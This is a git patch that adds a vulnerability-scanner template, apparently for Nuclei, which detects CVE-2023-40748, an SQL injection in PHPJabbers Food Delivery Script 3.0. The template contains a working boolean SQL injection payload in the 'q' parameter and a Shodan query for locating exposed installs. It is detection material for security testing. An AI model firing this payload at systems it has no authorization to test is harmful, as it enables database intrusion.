From f0997fa9eb2c36bea24e2e87401cf9646dc2282e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 22 Oct 2024 13:53:25 +0530 Subject: [PATCH] Create CVE-2023-40748.yaml --- http/cves/2023/CVE-2023-40748.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-40748.yaml diff --git a/http/cves/2023/CVE-2023-40748.yaml b/http/cves/2023/CVE-2023-40748.yaml new file mode 100644 index 0000000000..706bc9d363 --- /dev/null +++ b/http/cves/2023/CVE-2023-40748.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-40748 + +info: + name: PHPJabbers Food Delivery Script - SQL Injection + author: ritikchaddha + severity: critical + description: | + PHPJabbers Food Delivery Script 3.0 has a SQL injection (SQLi) vulnerability in the "q" parameter of index.php. + reference: + - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f + - https://nvd.nist.gov/vuln/detail/CVE-2023-40748 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-40748 + cwe-id: CWE-89 + cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: html:"PHPJabbers" + vendor: phpjabbers + product: food_delivery_script + tags: cve,cve2023,phpjabbers,food-delivery,sqli + +http: + - method: POST + path: + - "{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "class pjAdminOrdersaction" + - "didn't exists" + condition: and + + - type: status + status: + - 200